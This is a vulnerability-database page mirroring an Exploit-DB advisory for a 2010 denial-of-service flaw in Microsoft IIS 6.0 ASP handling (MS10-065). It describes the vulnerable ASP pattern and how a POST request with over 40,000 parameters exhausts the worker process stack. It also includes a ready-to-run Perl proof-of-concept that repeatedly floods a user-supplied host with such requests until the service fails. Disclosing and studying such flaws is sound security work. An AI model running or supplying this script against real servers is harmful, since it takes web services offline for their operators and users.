Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Microsoft IIS 6.0 - ASP Stack Overflow Stack Exhaustion (Denial of Service) (MS10-065)

🗓️ 01 Oct 2010 00:00:00Reported by kingcopeType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 357 Views

Microsoft IIS 6.0 - ASP Stack Overflow Denial of Servic

Code
Affected Vendors
Microsoft

Affected Products
Only Microsoft IIS 6.0 was tested successfully
On a Windows Server 2003 SP2 System
The System was NOT updated to the latest patches during testing.
Since tests “in the wild” have shown the attack to be real this advisory was released.

Vulnerability Details

The vulnerability allows remote unauthenticated attackers to force the IIS server to become
unresponsive until the IIS service is restarted manually by the administrator.
Required is that Active Server Pages are hosted by the IIS and that an ASP script reads out a
Post Form value. When the following ASP script is hosted by IIS the attacker can run the
attack:

	<%
		Dim variable
		variable = Request.Form(“FOOBAR”)
	%>

This small script reads out a POST request argument from the client side.

The exploit is simple: The attacker sends a POST request to the ASP site which reads out
POST arguments. The POST request includes > 40000 request parameters and is sent in the
form of an application/x-www-form-urlencoded encoding type.

The result is that one IIS worker process crashes because of a stack overflow (here stack
exhaustion). Tests have shown that five consecutive requests of this type will cause the
default application pool to be disabled because of a series of failures of the IIS worker
processes. The IIS shows a “Service Unavailable” response to requesting clients until the
World Wide Web Publishing Service is restarted manually by the administrator.


PoC Exploit
# IIS 6.0 ASP DoS PoC
# usage: perl IISdos.pl <host> <asp page>
use IO::Socket;
$|=1;
$host = $ARGV[0];
$script = $ARGV[1];
while(1) {
$sock = IO::Socket::INET->new(PeerAddr => $host,
                   PeerPort => 'http(80)',
                   Proto => 'tcp');
$write = "C=A&" x 40000;
print $sock "HEAD /$script HTTP/1.1\r\nHost: $host\r\n"
           ."Connection:Close\r\nContent-Type: application/x-www-form-urlencoded\r\n"
           ."Content-Length:". length($write) ."\r\n\r\n" . $write;
print ".";
while(<$sock>) {
           print;
}
}


Exploit-DB Notes:
In our tests, a specific setting has to be modified in metabase.xml in order to trigger the exhaustion.  Tested systems: Windows Server 2003 Standard SP2, Windows Server 2003 Standard SP1, Windows Server 2003 Standard SP0

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Oct 2010 00:00Current
7.4High risk
Vulners AI Score7.4
microsoft iis 6.0aspstack overflowdenial of servicems10-065vulnerabilityremote attackactive server pageswindows server 2003service unavailableexploit-db
357